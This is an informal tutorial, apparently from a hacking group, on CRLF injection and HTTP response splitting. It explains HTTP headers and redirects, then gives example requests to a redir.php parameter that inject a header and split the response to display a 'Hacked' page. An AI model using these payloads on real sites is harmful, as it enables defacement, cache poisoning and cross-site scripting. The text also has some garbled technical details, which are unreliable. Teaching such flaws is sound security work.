CRLF Injection

CRLF Injection / HTTP Response Splitting

----------------------------------------

Presented by :-

Gurender Singh

C0d3 N4m3 – Un_N0n Antil0g

>> Team Indi HeX (Admin)

>> Indian Cyber Police (Core Member)

Biography of Author

Gurender Singh A.K.A Un_N0n Antil0g is Learner and Independent IT security researcher , currently working with Team Indi HeX And ICP Helping new people in field of hacking and security. He is Admin of Team Indi HeX. And Admin of Indian Cyber Police with Nipun jaswal , Chetan Soni , COde InjectOr.

Gurender with his team , have hacked and patched many servers. Have helped many admins to restore there servers and stuff.

BRIEF INTRODUCTION

CRLF Injection Vulnerability is a web application vulnerability happens due to direct passing of user entered data to the response header fields like (Location, Set-Cookie and ETC) without proper sanitations, which can result in various forms of security exploits. Security exploits range from XSS, Cache-Poisoning, Cache-based defacement, page injection and ETC.

WHAT IS CRLF ?

CR (Carriage Return) and LF (Line Feed) are non-printable characters which indicate end-of-line.

>> Like:-

If you type anything in any text editor, then press enter, the CR and LF characters are automatically inserted at end of line.

In ASCII table,

CR has value equals to 13

And LF has value equals to 10

(Both in decimals)

Sometimes they are also written as:-

“r\n\”.

HTTP HEADER

HTTP HEADERS are requests to server, and in return server responses to it showing the required webpage.

In other words,

Its requests to server through web browser, in return server response, and the web browser reads it then displays web pages.

The first page that opens in web browser is:-

THE HOMEPAGE OF WEBSITE.

For example:-

www.abc.com

so to understand it more , I will show you the requests that browser makes and the request it receives from server.

http://www.abc.com/

[#] ~ Browser’s Request.

---------------------------------------------------GET/HTTP/1.1[CRLF]

Host: www.ABC.com[CRLF]

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF]

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5[CRLF]

Accept-Encoding: gzip, deflate[CRLF]

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF]

Connection: keep-alive[CRLF][CRLF]

[#] ~ Server’s Response.

---------------------------------------------------HTTP/1.1,200,OK[CRLF]

Date: Wed,24,Aug,2011 17:48:46 GMT[CRLF]

Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]

X-Powered-By: PHP/5.0.2[CRLF]

Keep-Alive: timeout=15, max=100[CRLF]

Connection: Keep-Alive[CRLF]

Transfer-Encoding: chunked[CRLF]

Content-Type: text/html[CRLF][CRLF]

[#] ~ WEBPAGE DISPLAYED.

---------------------------------------------------<HTML>

<BODY>

<TITLE>

Welcome to ABC.com

</TITLE>

<BODY>

<CENTER>

Welcome to ABC.com

</CENTER>

</BODY>

</HTML>

---------------------------------------------------

As shown above, browser sends request to server, server reads that request and response

to it, browser understands that request by server

and displays that WEBPAGE.

REDIRECTION

All most every websites have redirections, redirection is process, in which the particular webpage redirects the current page to another webpage in some time (depending upon JavaScript used).

>> Let’s take example and understand it.

Suppose this website abc.com redirects to xyz.com.

So the code present would be something like this:-

<HTML><BODY><TITLE> Welcome to Example.com</TITLE><META HTTP-EQUIV='Refresh'

CONTENT='5; URL=http://www.ABC.com/redir.php?url=http://www.XYZ.com'><body><b>

<center>Welcome to ABC.com

</b><br><br><br><br>

<font color='red' size='4'>Please wait a few seconds while we redirect you to the main page</font>

</center></BODY></HTML>

META tag contains all details about the redirection.

[#] ~ HEADER VIEW OF REDIRECTION.

---------------------------------------------------GET/redir.php?url=http://www.XYZ.com HTTP/1.1[CRLF]



Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]





HTTP/1.1 302 Found[CRLF]

Date: Tue, 23 Aug 2011 17:52:17 GMT[CRLF]



Location: http://www.XYZ.com[CRLF] (User-input in Location)




Content-Type: text/html[CRLF]

GET / HTTP/1.1[CRLF]

Host: www.XYZ.com[CRLF]


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]


Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7


---------------------------------------------------

The server of www.XYZ.com responds with “HTTP 200 OK” and displays the content of homepage of XYZ.com.

>> ./NOW THE REAL WORK START HERE

CRLF INJECTION.So, we have learned about HTTP HEADERS and REDIRECTION.As we can observe, the data coming from user can be modified.

So for what the hell your waiting for ? :P

Modify it

Let us take one example:-

Notice %0d%0a in following Request:-

(CR also have D or 0D value in hex and RL have A and 0A in hex)


---------------------------------------------------

GET/redir.php?url=%0D%0ANew_Header:New_Header_Value%0D%0A HTTP/1.1[CRLF]

Host: www.example.com[CRLF]


Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]





[#] ~ Server’s Reponse.

---------------------------------------------------HTTP/1.1 302 Found[CRLF]




Location: [CRLF]

New_Header: New_Header_Value[CRLF] (An injected header field using the CRLF characters, )





---------------------------------------------------

As you can see , in above browser request, we have injected one CRLF characters.

Its injected around the value:-

New_Header:New_Header_Value (%0D%0ANew_Header:New_Header_Value%0D%0A)

The %0D%0A is CRLF Character that we have injected in request of browser .

ANOTHER EXAMPLE.


--------------------------------------------------- GET/redir.php?url=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Ccenter%3E%3Ch1%3EHacked%3C/h1%3E%3C/center%3E HTTP/1.1[CRLF]



Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]





[#] ~ Server’s Reponse.

---------------------------------------------------HTTP/1.1 302 Found[CRLF]




Location:[CRLF]


HTTP/1.1 200 OK [CRLF] (New Response Header Created Using CRLF Injection, Response Splitting)


<center><h1>Hacked</h1></center>[CRLF]





0

In Above,

That shows the creation of new header using CRLF injection.

The entire data in the "url" parameter is again injected in the response header this time the data is crafted such a way that it leads to a new header creation.

Now,the webpage that will display will be something like this.

Hope you guys like this book on CRLF injection.

I will soon release video on it that would help you to understand this Vulnerbility in deep.

Source:-

>> GOOGLE

This is Un_N0n Antil0g ,

[#] ~ Logging out.

THANK YOU

CRLF Injection

Documents

Transcript of CRLF Injection